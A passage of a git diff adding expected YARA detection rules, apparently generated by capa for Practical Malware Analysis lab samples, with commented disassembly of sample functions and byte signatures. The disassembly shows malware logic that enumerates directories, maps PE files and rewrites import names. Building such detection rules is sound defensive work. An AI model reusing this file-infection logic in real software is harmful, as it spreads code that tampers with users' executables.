83c9ff or ecx,0xffffffff + .text:0x00401363 33c0 xor eax,eax + .text:0x00401365 f2ae repnz: scasb + .text:0x00401367 f7d1 not ecx + .text:0x00401369 49 dec ecx + .text:0x0040136a 8bfd mov edi,ebp + .text:0x0040136c 8d5c0c3c lea ebx,dword [esp + ecx + 60] + .text:0x00401370 83c9ff or ecx,0xffffffff + .text:0x00401373 f2ae repnz: scasb + .text:0x00401375 f7d1 not ecx + .text:0x00401377 49 dec ecx + .text:0x00401378 8d7c2440 lea edi,dword [esp + 64] + .text:0x0040137c 8bd1 mov edx,ecx + .text:0x0040137e 83c9ff or ecx,0xffffffff + .text:0x00401381 f2ae repnz: scasb + .text:0x00401383 f7d1 not ecx + .text:0x00401385 49 dec ecx + .text:0x00401386 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x0040138a 50 push eax + .text:0x0040138b ff152c204000 call dword [0x0040202c] ;msvcrt.malloc(0xffffffff) + 
.text:0x00401391 8b94245c010000 mov edx,dword [esp + 348] + .text:0x00401398 8be8 mov ebp,eax + .text:0x0040139a 8bfa mov edi,edx + .text:0x0040139c 83c9ff or ecx,0xffffffff + .text:0x0040139f 33c0 xor eax,eax + .text:0x004013a1 6830304000 push 0x00403030 + .text:0x004013a6 f2ae repnz: scasb + .text:0x004013a8 f7d1 not ecx + .text:0x004013aa 2bf9 sub edi,ecx + .text:0x004013ac 53 push ebx + .text:0x004013ad 8bc1 mov eax,ecx + .text:0x004013af 8bf7 mov esi,edi + .text:0x004013b1 8bfd mov edi,ebp + .text:0x004013b3 c1e902 shr ecx,2 + .text:0x004013b6 f3a5 rep: movsd + .text:0x004013b8 8bc8 mov ecx,eax + .text:0x004013ba 33c0 xor eax,eax + .text:0x004013bc 83e103 and ecx,3 + .text:0x004013bf f3a4 rep: movsb + .text:0x004013c1 8bfa mov edi,edx + .text:0x004013c3 83c9ff or ecx,0xffffffff + .text:0x004013c6 f2ae repnz: scasb + .text:0x004013c8 f7d1 not ecx + .text:0x004013ca 49 dec ecx + .text:0x004013cb 8d7c244c lea edi,dword [esp + 76] + .text:0x004013cf 884429ff mov byte [ecx + ebp + -1],al + .text:0x004013d3 83c9ff or ecx,0xffffffff + .text:0x004013d6 f2ae repnz: scasb + .text:0x004013d8 f7d1 not ecx + .text:0x004013da 2bf9 sub edi,ecx + .text:0x004013dc 8bf7 mov esi,edi + .text:0x004013de 8bd1 mov edx,ecx + .text:0x004013e0 8bfd mov edi,ebp + .text:0x004013e2 83c9ff or ecx,0xffffffff + .text:0x004013e5 f2ae repnz: scasb + .text:0x004013e7 8bca mov ecx,edx + .text:0x004013e9 4f dec edi + .text:0x004013ea c1e902 shr ecx,2 + .text:0x004013ed f3a5 rep: movsd + .text:0x004013ef 8bca mov ecx,edx + .text:0x004013f1 83e103 and ecx,3 + .text:0x004013f4 f3a4 rep: movsb + .text:0x004013f6 ff1564204000 call dword [0x00402064] ;msvcrt._stricmp(local281,0x00403030) + .text:0x004013fc 83c40c add esp,12 + .text:0x004013ff 85c0 test eax,eax + .text:0x00401401 7509 jnz 0x0040140c + .text:0x00401403 55 push ebp + .text:0x00401404 e897fcffff call 0x004010a0 ;sub_004010a0(msvcrt.malloc(0xffffffff)) + .text:0x00401409 83c404 add esp,4 + .text:0x0040140c loc_0040140c: [1 XREFS] + 
.text:0x0040140c 8bac2458010000 mov ebp,dword [esp + 344] + .text:0x00401413 loc_00401413: [1 XREFS] + .text:0x00401413 8b742410 mov esi,dword [esp + 16] + .text:0x00401417 8d442414 lea eax,dword [esp + 20] + .text:0x0040141b 50 push eax + .text:0x0040141c 56 push esi + .text:0x0040141d ff151c204000 call dword [0x0040201c] ;kernel32.FindNextFileA(kernel32.FindFirstFileA(arg0,local320),local320) + .text:0x00401423 85c0 test eax,eax + .text:0x00401425 740d jz 0x00401434 + .text:0x00401427 e9e4fdffff jmp 0x00401210 + .text:0x0040142c loc_0040142c: [1 XREFS] + .text:0x0040142c 6aff push 0xffffffff + .text:0x0040142e ff1518204000 call dword [0x00402018] ;kernel32.FindClose(0xffffffff) + .text:0x00401434 loc_00401434: [2 XREFS] + .text:0x00401434 5f pop edi + .text:0x00401435 5e pop esi + .text:0x00401436 5d pop ebp + .text:0x00401437 5b pop ebx + .text:0x00401438 81c444010000 add esp,324 + .text:0x0040143e c3 ret + */ + $c1 = { 8B 44 24 ?? 81 EC 44 01 00 00 83 F8 07 53 55 56 57 0F 8F ?? ?? ?? ?? 8B AC 24 ?? ?? ?? ?? 8D 44 24 ?? 50 55 FF 15 ?? ?? ?? ?? 8B F0 89 74 24 ?? 83 FE FF 0F 84 ?? ?? ?? ?? F6 44 24 ?? 10 0F 84 ?? ?? ?? ?? BE 40 30 40 00 8D 44 24 ?? 8A 10 8A 1E 8A CA 3A D3 75 ?? 84 C9 74 ?? 8A 50 ?? 8A 5E ?? 8A CA 3A D3 75 ?? 83 C0 02 83 C6 02 84 C9 75 ?? 33 C0 EB ?? 1B C0 83 D8 FF 85 C0 0F 84 ?? ?? ?? ?? BE 3C 30 40 00 8D 44 24 ?? 8A 10 8A 1E 8A CA 3A D3 75 ?? 84 C9 74 ?? 8A 50 ?? 8A 5E ?? 8A CA 3A D3 75 ?? 83 C0 02 83 C6 02 84 C9 75 ?? 33 C0 EB ?? 1B C0 83 D8 FF 85 C0 0F 84 ?? ?? ?? ?? 8D 7C 24 ?? 83 C9 FF 33 C0 F2 AE F7 D1 49 8B FD 8B D1 83 C9 FF F2 AE F7 D1 49 8D 44 51 ?? 50 FF 15 ?? ?? ?? ?? 8B D0 83 C9 FF 8B FD 33 C0 F2 AE F7 D1 2B F9 8B C1 8B F7 C1 E9 02 8B FA F3 A5 8B C8 33 C0 83 E1 03 F3 A4 83 C9 FF 8B FD F2 AE F7 D1 49 8D 7C 24 ?? 88 44 11 ?? 
83 C9 FF F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF F2 AE 8B CB 4F C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 BF 38 30 40 00 83 C9 FF F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF F2 AE 8B CB 4F C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 8B 8C 24 ?? ?? ?? ?? 41 51 52 E8 ?? ?? ?? ?? 83 C4 0C E9 ?? ?? ?? ?? 8D 7C 24 ?? 83 C9 FF 33 C0 F2 AE F7 D1 49 8B FD 8D 5C 0C ?? 83 C9 FF F2 AE F7 D1 49 8D 7C 24 ?? 8B D1 83 C9 FF F2 AE F7 D1 49 8D 44 0A ?? 50 FF 15 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 8B E8 8B FA 83 C9 FF 33 C0 68 30 30 40 00 F2 AE F7 D1 2B F9 53 8B C1 8B F7 8B FD C1 E9 02 F3 A5 8B C8 33 C0 83 E1 03 F3 A4 8B FA 83 C9 FF F2 AE F7 D1 49 8D 7C 24 ?? 88 44 29 ?? 83 C9 FF F2 AE F7 D1 2B F9 8B F7 8B D1 8B FD 83 C9 FF F2 AE 8B CA 4F C1 E9 02 F3 A5 8B CA 83 E1 03 F3 A4 FF 15 ?? ?? ?? ?? 83 C4 0C 85 C0 75 ?? 55 E8 ?? ?? ?? ?? 83 C4 04 8B AC 24 ?? ?? ?? ?? 8B 74 24 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? E9 ?? ?? ?? ?? 6A FF FF 15 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 44 01 00 00 C3 } + /* +function at 0x004010a0@bb7425b82141a1c0f7d60e5106676bb1 with 1 features: + - read file via mapping + .text:0x004010a0 + .text:0x004010a0 FUNC: int cdecl sub_004010a0( int arg0, ) [2 XREFS] + .text:0x004010a0 + .text:0x004010a0 Stack Variables: (offset from initial top of stack) + .text:0x004010a0 4: int arg0 + .text:0x004010a0 -4: int local4 + .text:0x004010a0 -8: int local8 + .text:0x004010a0 -12: int local12 + .text:0x004010a0 + .text:0x004010a0 83ec0c sub esp,12 + .text:0x004010a3 53 push ebx + .text:0x004010a4 8b442414 mov eax,dword [esp + 20] + .text:0x004010a8 55 push ebp + .text:0x004010a9 56 push esi + .text:0x004010aa 57 push edi + .text:0x004010ab 6a00 push 0 + .text:0x004010ad 6a00 push 0 + .text:0x004010af 6a03 push 3 + .text:0x004010b1 6a00 push 0 + .text:0x004010b3 6a01 push 1 + .text:0x004010b5 6800000010 push 0x10000000 + .text:0x004010ba 50 push eax + .text:0x004010bb ff1514204000 call dword [0x00402014] ;kernel32.CreateFileA(arg0,0x10000000,1,0,3,0,0) + .text:0x004010c1 6a00 push 0 + 
.text:0x004010c3 6a00 push 0 + .text:0x004010c5 6a00 push 0 + .text:0x004010c7 6a04 push 4 + .text:0x004010c9 6a00 push 0 + .text:0x004010cb 50 push eax + .text:0x004010cc 89442430 mov dword [esp + 48],eax + .text:0x004010d0 ff1510204000 call dword [0x00402010] ;kernel32.CreateFileMappingA(kernel32.CreateFileA(arg0,0x10000000,1,0,3,0,0),0,4,0,0,0) + .text:0x004010d6 6a00 push 0 + .text:0x004010d8 6a00 push 0 + .text:0x004010da 6a00 push 0 + .text:0x004010dc 681f000f00 push 0x000f001f + .text:0x004010e1 50 push eax + .text:0x004010e2 89442428 mov dword [esp + 40],eax + .text:0x004010e6 ff150c204000 call dword [0x0040200c] ;kernel32.MapViewOfFile(kernel32.CreateFileMappingA(<0x004010bb>,0,4,0,0,0),0x000f001f,0,0,0) + .text:0x004010ec 8bf0 mov esi,eax + .text:0x004010ee 85f6 test esi,esi + .text:0x004010f0 89742410 mov dword [esp + 16],esi + .text:0x004010f4 0f84db000000 jz 0x004011d5 + .text:0x004010fa 8b6e3c mov ebp,dword [esi + 60] + .text:0x004010fd 8b1d08204000 mov ebx,dword [0x00402008] + .text:0x00401103 03ee add ebp,esi + .text:0x00401105 6a04 push 4 + .text:0x00401107 55 push ebp + .text:0x00401108 ffd3 call ebx ;kernel32.IsBadReadPtr(0xa2bb7170,4) + .text:0x0040110a 85c0 test eax,eax + .text:0x0040110c 0f85c3000000 jnz 0x004011d5 + .text:0x00401112 817d0050450000 cmp dword [ebp],0x00004550 + .text:0x00401119 0f85b6000000 jnz 0x004011d5 + .text:0x0040111f 8b8d80000000 mov ecx,dword [ebp + 128] + .text:0x00401125 56 push esi + .text:0x00401126 55 push ebp + .text:0x00401127 51 push ecx + .text:0x00401128 e813ffffff call 0x00401040 ;sub_00401040(0x61616161,0xa2bb7170,kernel32.MapViewOfFile(<0x004010d0>,0x000f001f,0,0,0)) + .text:0x0040112d 83c40c add esp,12 + .text:0x00401130 8bf8 mov edi,eax + .text:0x00401132 6a14 push 20 + .text:0x00401134 57 push edi + .text:0x00401135 ffd3 call ebx ;kernel32.IsBadReadPtr(sub_00401040(0x61616161,0xa2bb7170,<0x004010e6>),20) + .text:0x00401137 85c0 test eax,eax + .text:0x00401139 0f8596000000 jnz 0x004011d5 + 
.text:0x0040113f 83c70c add edi,12 + .text:0x00401142 loc_00401142: [1 XREFS] + .text:0x00401142 8b47f8 mov eax,dword [edi - 8] + .text:0x00401145 897c2420 mov dword [esp + 32],edi + .text:0x00401149 85c0 test eax,eax + .text:0x0040114b 7505 jnz 0x00401152 + .text:0x0040114d 833f00 cmp dword [edi],0 + .text:0x00401150 745a jz 0x004011ac + .text:0x00401152 loc_00401152: [1 XREFS] + .text:0x00401152 8b17 mov edx,dword [edi] + .text:0x00401154 56 push esi + .text:0x00401155 55 push ebp + .text:0x00401156 52 push edx + .text:0x00401157 e8e4feffff call 0x00401040 ;sub_00401040(0x61616161,0xa2bb7170,<0x004010e6>) + .text:0x0040115c 83c40c add esp,12 + .text:0x0040115f 8bd8 mov ebx,eax + .text:0x00401161 6a14 push 20 + .text:0x00401163 53 push ebx + .text:0x00401164 ff1508204000 call dword [0x00402008] ;kernel32.IsBadReadPtr(sub_00401040(0x61616161,0xa2bb7170,<0x004010e6>),20) + .text:0x0040116a 85c0 test eax,eax + .text:0x0040116c 7567 jnz 0x004011d5 + .text:0x0040116e 6820304000 push 0x00403020 + .text:0x00401173 53 push ebx + .text:0x00401174 ff1564204000 call dword [0x00402064] ;msvcrt._stricmp(<0x00401157>,0x00403020) + .text:0x0040117a 83c408 add esp,8 + .text:0x0040117d 85c0 test eax,eax + .text:0x0040117f 7526 jnz 0x004011a7 + .text:0x00401181 8bfb mov edi,ebx + .text:0x00401183 83c9ff or ecx,0xffffffff + .text:0x00401186 f2ae repnz: scasb + .text:0x00401188 f7d1 not ecx + .text:0x0040118a 8bc1 mov eax,ecx + .text:0x0040118c be10304000 mov esi,0x00403010 + .text:0x00401191 8bfb mov edi,ebx + .text:0x00401193 c1e902 shr ecx,2 + .text:0x00401196 f3a5 rep: movsd + .text:0x00401198 8bc8 mov ecx,eax + .text:0x0040119a 83e103 and ecx,3 + .text:0x0040119d f3a4 rep: movsb + .text:0x0040119f 8b742410 mov esi,dword [esp + 16] + .text:0x004011a3 8b7c2420 mov edi,dword [esp + 32] + .text:0x004011a7 loc_004011a7: [1 XREFS] + .text:0x004011a7 83c714 add edi,20 + .text:0x004011aa eb96 jmp 0x00401142 + .text:0x004011ac loc_004011ac: [1 XREFS] + .text:0x004011ac 81c5d0000000 add 
ebp,208 + .text:0x004011b2 33c9 xor ecx,ecx + .text:0x004011b4 56 push esi + .text:0x004011b5 894d00 mov dword [ebp],ecx + .text:0x004011b8 894d04 mov dword [ebp + 4],ecx + .text:0x004011bb ff1504204000 call dword [0x00402004] ;kernel32.UnmapViewOfFile(<0x004010e6>) + .text:0x004011c1 8b542414 mov edx,dword [esp + 20] + .text:0x004011c5 8b3500204000 mov esi,dword [0x00402000] + .text:0x004011cb 52 push edx + .text:0x004011cc ffd6 call esi ;kernel32.CloseHandle(<0x004010d0>) + .text:0x004011ce 8b442418 mov eax,dword [esp + 24] + .text:0x004011d2 50 push eax + .text:0x004011d3 ffd6 call esi ;kernel32.CloseHandle(<0x004010bb>) + .text:0x004011d5 loc_004011d5: [5 XREFS] + .text:0x004011d5 5f pop edi + .text:0x004011d6 5e pop esi + .text:0x004011d7 5d pop ebp + .text:0x004011d8 5b pop ebx + .text:0x004011d9 83c40c add esp,12 + .text:0x004011dc c3 ret + */ + $c2 = { 83 EC 0C 53 8B 44 24 ?? 55 56 57 6A 00 6A 00 6A 03 6A 00 6A 01 68 00 00 00 10 50 FF 15 ?? ?? ?? ?? 6A 00 6A 00 6A 00 6A 04 6A 00 50 89 44 24 ?? FF 15 ?? ?? ?? ?? 6A 00 6A 00 6A 00 68 1F 00 0F 00 50 89 44 24 ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 89 74 24 ?? 0F 84 ?? ?? ?? ?? 8B 6E ?? 8B 1D ?? ?? ?? ?? 03 EE 6A 04 55 FF D3 85 C0 0F 85 ?? ?? ?? ?? 81 7D ?? 50 45 00 00 0F 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 56 55 51 E8 ?? ?? ?? ?? 83 C4 0C 8B F8 6A 14 57 FF D3 85 C0 0F 85 ?? ?? ?? ?? 83 C7 0C 8B 47 ?? 89 7C 24 ?? 85 C0 75 ?? 83 3F 00 74 ?? 8B 17 56 55 52 E8 ?? ?? ?? ?? 83 C4 0C 8B D8 6A 14 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 20 30 40 00 53 FF 15 ?? ?? ?? ?? 83 C4 08 85 C0 75 ?? 8B FB 83 C9 FF F2 AE F7 D1 8B C1 BE 10 30 40 00 8B FB C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 74 24 ?? 8B 7C 24 ?? 83 C7 14 EB ?? 81 C5 D0 00 00 00 33 C9 56 89 4D ?? 89 4D ?? FF 15 ?? ?? ?? ?? 8B 54 24 ?? 8B 35 ?? ?? ?? ?? 52 FF D6 8B 44 24 ?? 
50 FF D6 5F 5E 5D 5B 83 C4 0C C3 } + /* +function at 0x00401000@bb7425b82141a1c0f7d60e5106676bb1 with 1 features: + - enumerate PE sections + .text:0x00401000 Segment: .text (4096 bytes) + .text:0x00401000 + .text:0x00401000 FUNC: int cdecl sub_00401000( int arg0, int arg1, ) [4 XREFS] + .text:0x00401000 + .text:0x00401000 Stack Variables: (offset from initial top of stack) + .text:0x00401000 8: int arg1 + .text:0x00401000 4: int arg0 + .text:0x00401000 + .text:0x00401000 8b542408 mov edx,dword [esp + 8] + .text:0x00401004 33c0 xor eax,eax + .text:0x00401006 33c9 xor ecx,ecx + .text:0x00401008 53 push ebx + .text:0x00401009 668b4214 mov ax,word [edx + 20] + .text:0x0040100d 668b4a06 mov cx,word [edx + 6] + .text:0x00401011 56 push esi + .text:0x00401012 33f6 xor esi,esi + .text:0x00401014 85c9 test ecx,ecx + .text:0x00401016 57 push edi + .text:0x00401017 8d441018 lea eax,dword [eax + edx + 24] + .text:0x0040101b 7e1c jle 0x00401039 + .text:0x0040101d 8b7c2410 mov edi,dword [esp + 16] + .text:0x00401021 loc_00401021: [1 XREFS] + .text:0x00401021 8b500c mov edx,dword [eax + 12] + .text:0x00401024 3bfa cmp edi,edx + .text:0x00401026 7209 jc 0x00401031 + .text:0x00401028 8b5808 mov ebx,dword [eax + 8] + .text:0x0040102b 03da add ebx,edx + .text:0x0040102d 3bfb cmp edi,ebx + .text:0x0040102f 720a jc 0x0040103b + .text:0x00401031 loc_00401031: [1 XREFS] + .text:0x00401031 46 inc esi + .text:0x00401032 83c028 add eax,40 + .text:0x00401035 3bf1 cmp esi,ecx + .text:0x00401037 7ce8 jl 0x00401021 + .text:0x00401039 loc_00401039: [1 XREFS] + .text:0x00401039 33c0 xor eax,eax + .text:0x0040103b loc_0040103b: [1 XREFS] + .text:0x0040103b 5f pop edi + .text:0x0040103c 5e pop esi + .text:0x0040103d 5b pop ebx + .text:0x0040103e c3 ret + */ + $c3 = { 8B 54 24 ?? 33 C0 33 C9 53 66 8B 42 ?? 66 8B 4A ?? 56 33 F6 85 C9 57 8D 44 10 ?? 7E ?? 8B 7C 24 ?? 8B 50 ?? 3B FA 72 ?? 8B 58 ?? 03 DA 3B FB 72 ?? 46 83 C0 28 3B F1 7C ?? 33 C0 5F 5E 5B C3 } + condition: + all of them +} + 
diff --git a/yara/expected_pma_03-04.exe_11-03.exe_16-01.exe b/yara/expected_pma_03-04.exe_11-03.exe_16-01.exe new file mode 100644 index 0000000..f75c521 --- /dev/null +++ b/yara/expected_pma_03-04.exe_11-03.exe_16-01.exe 
@@ -0,0 +1,6528 @@ +rule super_rule_18ec5 +{ + meta: + author = "CAPA Matches" + date_created = "2023-08-10" + date_modified = "2023-08-10" + description = "" + md5 = "18ec5becfa3991fb654e105bafbd5a4b" + strings: + /* +function at 0x004012d0@18ec5becfa3991fb654e105bafbd5a4b with 1 features: + - copy file + .text:0x004012d0 + .text:0x004012d0 FUNC: int msfastcall sub_004012d0( int ecx, int edx, ) [2 XREFS] + .text:0x004012d0 + .text:0x004012d0 Stack Variables: (offset from initial top of stack) + .text:0x004012d0 -264: int local264 + .text:0x004012d0 + .text:0x004012d0 55 push ebp + .text:0x004012d1 8bec mov ebp,esp + .text:0x004012d3 81ec04010000 sub esp,260 + .text:0x004012d9 6a00 push 0 + .text:0x004012db 68b8914000 push 0x004091b8 + .text:0x004012e0 68a8914000 push 0x004091a8 + .text:0x004012e5 ff151c804000 call dword [0x0040801c] ;kernel32.CopyFileA(0x004091a8,0x004091b8,0) + .text:0x004012eb 689c914000 push 0x0040919c + .text:0x004012f0 6884914000 push 0x00409184 + .text:0x004012f5 8d85fcfeffff lea eax,dword [ebp - 260] + .text:0x004012fb 50 push eax + .text:0x004012fc e851010000 call 0x00401452 ;_sprintf(ecx,edx,local264,0x00409184,0x0040919c) + .text:0x00401301 83c40c add esp,12 + .text:0x00401304 8d8dfcfeffff lea ecx,dword [ebp - 260] + .text:0x0040130a 51 push ecx + .text:0x0040130b e860fdffff call 0x00401070 ;sub_00401070(local264) + .text:0x00401310 83c404 add esp,4 + .text:0x00401313 6874914000 push 0x00409174 + .text:0x00401318 e89f000000 call 0x004013bc ;sub_004013bc(sub_00401070(local264),edx,local264,0x00409174) + .text:0x0040131d 83c404 add esp,4 + .text:0x00401320 33c0 xor eax,eax + .text:0x00401322 8be5 mov esp,ebp + .text:0x00401324 5d pop ebp + .text:0x00401325 c3 ret + */ + $c0 = { 55 8B EC 81 EC 04 01 00 00 6A 00 68 B8 91 40 00 68 A8 91 40 00 FF 15 ?? ?? ?? ?? 68 9C 91 40 00 68 84 91 40 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 0C 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 04 68 74 91 40 00 E8 ?? ?? ?? ?? 
83 C4 04 33 C0 8B E5 5D C3 } + /* +function at 0x00401070@18ec5becfa3991fb654e105bafbd5a4b with 3 features: + - enumerate PE sections + - get file size + - read file via mapping + .text:0x00401070 + .text:0x00401070 FUNC: int cdecl sub_00401070( int arg0, ) [2 XREFS] + .text:0x00401070 + .text:0x00401070 Stack Variables: (offset from initial top of stack) + .text:0x00401070 4: int arg0 + .text:0x00401070 -8: int local8 + .text:0x00401070 -12: int local12 + .text:0x00401070 -16: int local16 + .text:0x00401070 -20: int local20 + .text:0x00401070 -24: int local24 + .text:0x00401070 -28: int local28 + .text:0x00401070 -32: int local32 + .text:0x00401070 -36: int local36 + .text:0x00401070 -40: int local40 + .text:0x00401070 -44: int local44 + .text:0x00401070 -48: int local48 + .text:0x00401070 -52: int local52 + .text:0x00401070 + .text:0x00401070 55 push ebp + .text:0x00401071 8bec mov ebp,esp + .text:0x00401073 83ec30 sub esp,48 + .text:0x00401076 56 push esi + .text:0x00401077 57 push edi + .text:0x00401078 c745fc00000000 mov dword [ebp - 4],0 + .text:0x0040107f 6a00 push 0 + .text:0x00401081 6880000000 push 128 + .text:0x00401086 6a04 push 4 + .text:0x00401088 6a00 push 0 + .text:0x0040108a 6a01 push 1 + .text:0x0040108c 68000000c0 push 0xc0000000 + .text:0x00401091 8b4508 mov eax,dword [ebp + 8] + .text:0x00401094 50 push eax + .text:0x00401095 ff1518804000 call dword [0x00408018] ;kernel32.CreateFileA(arg0,0xc0000000,1,0,4,128,0) + .text:0x0040109b 8945d4 mov dword [ebp - 44],eax + .text:0x0040109e 837dd4ff cmp dword [ebp - 44],0xffffffff + .text:0x004010a2 7508 jnz 0x004010ac + .text:0x004010a4 83c8ff or eax,0xffffffff + .text:0x004010a7 e919020000 jmp 0x004012c5 + .text:0x004010ac loc_004010ac: [1 XREFS] + .text:0x004010ac 6a00 push 0 + .text:0x004010ae 8b4dd4 mov ecx,dword [ebp - 44] + .text:0x004010b1 51 push ecx + .text:0x004010b2 ff1514804000 call dword [0x00408014] ;kernel32.GetFileSize(kernel32.CreateFileA(arg0,0xc0000000,1,0,4,128,0),0) + 
.text:0x004010b8 8945f0 mov dword [ebp - 16],eax + .text:0x004010bb 6a00 push 0 + .text:0x004010bd 8b55f0 mov edx,dword [ebp - 16] + .text:0x004010c0 52 push edx + .text:0x004010c1 6a00 push 0 + .text:0x004010c3 6a04 push 4 + .text:0x004010c5 6a00 push 0 + .text:0x004010c7 8b45d4 mov eax,dword [ebp - 44] + .text:0x004010ca 50 push eax + .text:0x004010cb ff1510804000 call dword [0x00408010] ;kernel32.CreateFileMappingA(<0x00401095>,0,4,0,kernel32.GetFileSize(<0x00401095>,0),0) + .text:0x004010d1 8945f4 mov dword [ebp - 12],eax + .text:0x004010d4 837df4ff cmp dword [ebp - 12],0xffffffff + .text:0x004010d8 7512 jnz 0x004010ec + .text:0x004010da 8b4dd4 mov ecx,dword [ebp - 44] + .text:0x004010dd 51 push ecx + .text:0x004010de ff150c804000 call dword [0x0040800c] ;kernel32.CloseHandle(<0x00401095>) + .text:0x004010e4 83c8ff or eax,0xffffffff + .text:0x004010e7 e9d9010000 jmp 0x004012c5 + .text:0x004010ec loc_004010ec: [1 XREFS] + .text:0x004010ec 8b55f0 mov edx,dword [ebp - 16] + .text:0x004010ef 52 push edx + .text:0x004010f0 6a00 push 0 + .text:0x004010f2 6a00 push 0 + .text:0x004010f4 6a06 push 6 + .text:0x004010f6 8b45f4 mov eax,dword [ebp - 12] + .text:0x004010f9 50 push eax + .text:0x004010fa ff1508804000 call dword [0x00408008] ;kernel32.MapViewOfFile(kernel32.CreateFileMappingA(<0x00401095>,0,4,0,<0x004010b2>,0),6,0,0,<0x004010b2>) + .text:0x00401100 8945fc mov dword [ebp - 4],eax + .text:0x00401103 837dfc00 cmp dword [ebp - 4],0 + .text:0x00401107 7526 jnz 0x0040112f + .text:0x00401109 8b4dd4 mov ecx,dword [ebp - 44] + .text:0x0040110c 51 push ecx + .text:0x0040110d ff150c804000 call dword [0x0040800c] ;kernel32.CloseHandle(<0x00401095>) + .text:0x00401113 8b55f4 mov edx,dword [ebp - 12] + .text:0x00401116 52 push edx + .text:0x00401117 ff150c804000 call dword [0x0040800c] ;kernel32.CloseHandle(<0x004010cb>) + .text:0x0040111d 8b45fc mov eax,dword [ebp - 4] + .text:0x00401120 50 push eax + .text:0x00401121 ff1504804000 call dword [0x00408004] 
;kernel32.UnmapViewOfFile(<0x004010fa>) + .text:0x00401127 83c8ff or eax,0xffffffff + .text:0x0040112a e996010000 jmp 0x004012c5 + .text:0x0040112f loc_0040112f: [1 XREFS] + .text:0x0040112f 8b4dfc mov ecx,dword [ebp - 4] + .text:0x00401132 894de8 mov dword [ebp - 24],ecx + .text:0x00401135 8b55e8 mov edx,dword [ebp - 24] + .text:0x00401138 8b45fc mov eax,dword [ebp - 4] + .text:0x0040113b 03423c add eax,dword [edx + 60] + .text:0x0040113e 8945dc mov dword [ebp - 36],eax + .text:0x00401141 8b4ddc mov ecx,dword [ebp - 36] + .text:0x00401144 33d2 xor edx,edx + .text:0x00401146 668b5114 mov dx,word [ecx + 20] + .text:0x0040114a 8b45dc mov eax,dword [ebp - 36] + .text:0x0040114d 8d4c1018 lea ecx,dword [eax + edx + 24] + .text:0x00401151 894df8 mov dword [ebp - 8],ecx + .text:0x00401154 8b55dc mov edx,dword [ebp - 36] + .text:0x00401157 33c0 xor eax,eax + .text:0x00401159 668b4206 mov ax,word [edx + 6] + .text:0x0040115d 50 push eax + .text:0x0040115e 8b4df8 mov ecx,dword [ebp - 8] + .text:0x00401161 51 push ecx + .text:0x00401162 e899feffff call 0x00401000 ;sub_00401000(0xa2bc12e9,0x00006161) + .text:0x00401167 83c408 add esp,8 + .text:0x0040116a 8945ec mov dword [ebp - 20],eax + .text:0x0040116d 837dec00 cmp dword [ebp - 20],0 + .text:0x00401171 7526 jnz 0x00401199 + .text:0x00401173 8b55d4 mov edx,dword [ebp - 44] + .text:0x00401176 52 push edx + .text:0x00401177 ff150c804000 call dword [0x0040800c] ;kernel32.CloseHandle(<0x00401095>) + .text:0x0040117d 8b45f4 mov eax,dword [ebp - 12] + .text:0x00401180 50 push eax + .text:0x00401181 ff150c804000 call dword [0x0040800c] ;kernel32.CloseHandle(<0x004010cb>) + .text:0x00401187 8b4dfc mov ecx,dword [ebp - 4] + .text:0x0040118a 51 push ecx + .text:0x0040118b ff1504804000 call dword [0x00408004] ;kernel32.UnmapViewOfFile(<0x004010fa>) + .text:0x00401191 83c8ff or eax,0xffffffff + .text:0x00401194 e92c010000 jmp 0x004012c5 + .text:0x00401199 loc_00401199: [1 XREFS] + .text:0x00401199 8b55dc mov edx,dword [ebp - 36] + 
.text:0x0040119c 837a2800 cmp dword [edx + 40],0 + .text:0x004011a0 7508 jnz 0x004011aa + .text:0x004011a2 83c8ff or eax,0xffffffff + .text:0x004011a5 e91b010000 jmp 0x004012c5 + .text:0x004011aa loc_004011aa: [1 XREFS] + .text:0x004011aa 8b45ec mov eax,dword [ebp - 20] + .text:0x004011ad 8178103a010000 cmp dword [eax + 16],314 + .text:0x004011b4 7708 ja 0x004011be + .text:0x004011b6 83c8ff or eax,0xffffffff + .text:0x004011b9 e907010000 jmp 0x004012c5 + .text:0x004011be loc_004011be: [1 XREFS] + .text:0x004011be 8b4dec mov ecx,dword [ebp - 20] + .text:0x004011c1 8b55ec mov edx,dword [ebp - 20] + .text:0x004011c4 8b4110 mov eax,dword [ecx + 16] + .text:0x004011c7 2b4208 sub eax,dword [edx + 8] + .text:0x004011ca 8945e4 mov dword [ebp - 28],eax + .text:0x004011cd 817de43a010000 cmp dword [ebp - 28],314 + .text:0x004011d4 7308 jnc 0x004011de + .text:0x004011d6 83c8ff or eax,0xffffffff + .text:0x004011d9 e9e7000000 jmp 0x004012c5 + .text:0x004011de loc_004011de: [1 XREFS] + .text:0x004011de 8b4dec mov ecx,dword [ebp - 20] + .text:0x004011e1 8b5114 mov edx,dword [ecx + 20] + .text:0x004011e4 8b45ec mov eax,dword [ebp - 20] + .text:0x004011e7 035008 add edx,dword [eax + 8] + .text:0x004011ea 8955d8 mov dword [ebp - 40],edx + .text:0x004011ed c745e000000000 mov dword [ebp - 32],0 + .text:0x004011f4 eb09 jmp 0x004011ff + .text:0x004011f6 loc_004011f6: [1 XREFS] + .text:0x004011f6 8b4de0 mov ecx,dword [ebp - 32] + .text:0x004011f9 83c101 add ecx,1 + .text:0x004011fc 894de0 mov dword [ebp - 32],ecx + .text:0x004011ff loc_004011ff: [1 XREFS] + .text:0x004011ff 817de03a010000 cmp dword [ebp - 32],314 + .text:0x00401206 7374 jnc 0x0040127c + .text:0x00401208 8b55e0 mov edx,dword [ebp - 32] + .text:0x0040120b 33c0 xor eax,eax + .text:0x0040120d 8a8230904000 mov al,byte [edx + 0x00409030] + .text:0x00401213 83f878 cmp eax,120 + .text:0x00401216 755f jnz 0x00401277 + .text:0x00401218 